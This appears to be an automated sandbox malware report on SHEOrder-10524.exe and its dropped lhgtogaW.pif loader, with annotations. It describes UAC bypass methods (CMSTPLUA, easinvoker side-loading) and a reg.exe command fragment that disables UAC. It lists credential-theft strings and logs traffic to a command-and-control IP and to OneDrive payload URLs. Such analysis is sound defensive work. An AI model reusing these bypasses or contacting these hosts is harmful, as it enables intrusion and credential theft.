Note: CryptUnprotectData is the DPAPI call needed to decrypt browser-stored credentials such as the Chrome "Login Data" path found in the unpacked PE strings; it appears in process 5, one of the lhgtogaW.pif children started with a /stext output file, which matches the WebBrowserPassView-style recovery tool the Yara hit above refers to.
Source: SHEOrder-10524.exe, 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_79de4548-8)

                  Exploits

Source: Yara match | File sources, type UNPACKEDPE: 4.2.lhgtogaW.pif.400000.0.raw.unpack; 10.1.lhgtogaW.pif.400000.3.unpack; 4.1.lhgtogaW.pif.400000.3.unpack; 14.1.lhgtogaW.pif.400000.3.raw.unpack; 14.1.lhgtogaW.pif.400000.3.unpack; 4.2.lhgtogaW.pif.400000.0.unpack; 4.1.lhgtogaW.pif.400000.3.raw.unpack; 10.1.lhgtogaW.pif.400000.3.raw.unpack
Source: Yara match | File sources, type MEMORY: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp; 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp; 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp; 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp; 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp; 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp; 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp; 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp; 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp; 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp
Source: Yara match | File sources, type MEMORYSTR: Process Memory Space: SHEOrder-10524.exe PID: 7276; lhgtogaW.pif PID: 7432; lhgtogaW.pif PID: 7868; lhgtogaW.pif PID: 8068

                  Privilege Escalation

Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004074FD _wcslen,CoGetObject,4_2_004074FD
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004074FD _wcslen,CoGetObject,4_1_004074FD
Note: CoGetObject is the call used to instantiate a COM object from an elevation moniker (Elevation:Administrator!new:{CLSID}); together with the "UAC Bypass using CMSTP" Yara hits above, this is the auto-elevating CMSTPLUA COM interface bypass the signature "Contains functionality to bypass UAC (CMSTPLUA)" refers to. The unpacked PE separately carries the reg.exe ... Policies\System /v EnableLUA command string, which turns UAC off outright but needs an already elevated context to write HKLM.

                  Compliance

Source: C:\Users\Public\Libraries\lhgtogaW.pif | Unpacked PE file: 4.2.lhgtogaW.pif.400000.0.unpack
Source: SHEOrder-10524.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb | source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb | source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source: Binary string: easinvoker.pdbH | source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
Note: easinvoker.exe.0.dr (a file dropped by the sample) together with C:\Users\Public\Libraries\netutils.dll (flagged under AV Detection) is consistent with DBatLoader's documented UAC bypass, in which the Microsoft-signed, auto-elevating easinvoker.exe is made to side-load a malicious netutils.dll from a mock trusted directory; this report shows the files being dropped, not that step executing. The truesight.pdb path points to a bundled Adlice TrueSight build, which the report likewise does not show being loaded.
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028C58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028C58CC
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_274C10F1
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409253
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_1_0041C291
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_1_0040C34D
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409665
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_1_0040880C
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040783C FindFirstFileW,FindNextFileW,4_1_0040783C
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_1_00419AF5
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_1_0040BB30
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_1_0040BD37
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97

                  Networking

                  Source: Malware configuration extractor | URLs: 91.223.3.151
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028DC8AC InternetCheckConnectionA,0_2_028DC8AC
                  Source: global traffic | TCP traffic: 192.168.2.4:49733 -> 91.223.3.151:4508
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                  Source: Joe Sandbox View | IP Address: 13.107.139.11
                  Source: Joe Sandbox View | IP Address: 178.237.33.50
                  Source: Joe Sandbox View | ASN Name: PL-SKYTECH-ASPL
                  Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global traffic | HTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: onedrive.live.com
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0041B380
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: lhgtogaW.pif | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv1938.tmp.5.dr | String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: bhv1938.tmp.5.dr | String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                  Source: lhgtogaW.pif, 00000005.00000003.1793746944.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: t_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: lhgtogaW.pif, 00000005.00000003.1793746944.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: t_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: lhgtogaW.pif, 00000004.00000002.4156997111.00000000273A0000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: lhgtogaW.pif, 00000004.00000002.4156997111.00000000273A0000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global traffic | DNS traffic detected: DNS query: onedrive.live.com
                  Source: global traffic | DNS traffic detected: DNS query: bnaqzw.sn.files.1drv.com
                  Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: lhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                  Source: lhgtogaW.pif, 00000005.00000002.1794411249.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: SHEOrder-10524.exe, SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000000.1716894021.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000005.00000000.1778121431.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000006.00000000.1778301253.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000007.00000000.1778998992.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 0000000A.00000000.1881855840.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 0000000E.00000000.1938374574.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif.0.drString found in binary or memory: http://www.pmail.com
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                  Source: Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/W
                  Source: Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1885488700.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_SdW3Ee
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k4jns
                  Source: Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4mjSrmVGqdqL8hnH_btf-6Qys453bsv2FyIiEEOlZHaw9haei9AHV5FIa03OCcOV-q
                  Source: Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWHiUlu
                  Source: Wagotghl.PIF, 00000008.00000002.1885488700.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com:443/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_Sd
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com:443/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k
                  Source: Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com:443/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWH
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
